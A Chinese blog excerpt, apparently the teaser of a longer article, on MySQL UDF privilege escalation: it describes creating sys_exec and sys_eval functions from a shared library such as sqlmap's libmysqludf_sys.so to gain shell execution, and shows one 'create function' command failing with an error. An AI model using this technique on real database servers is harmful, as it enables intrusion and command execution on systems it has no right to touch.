UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限
网上有些文章利用的是sqlmap-master\udf\mysql\linux\64的libmysqludf_sys.so文件,但是测试中发现会报错
mysql> create function sys_eval returns string soname 'udf.so';
ERROR 1126 (HY000): Can't open shared library 'udf.so' (errno:...
阅读全文>>